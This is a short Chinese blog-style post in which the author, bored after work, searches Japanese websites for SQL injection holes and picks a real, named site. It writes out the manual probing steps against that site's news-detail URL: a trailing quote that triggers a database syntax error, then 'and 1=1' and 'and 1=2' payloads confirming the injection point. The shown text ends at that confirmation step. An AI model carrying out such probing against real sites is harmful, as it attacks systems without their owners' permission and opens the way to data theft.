经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了。找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一。去了解注入,还是有必要的。
随便google了几个日本网站,发现不少都在注入点,有很多用手工都比较鸡肋,终于找到了一个比较满意的。
0X01 判断是否为注入点
http://henecia.jp/news/detail.php?nid=162’
报错,显示MDB2 Error: syntax error
http://henecia.jp/news/detail.php?nid=162+and+1=1
显示正常
http://henecia.jp/news/detail.php?nid=162+and+1=2
显示异常,判断是注入点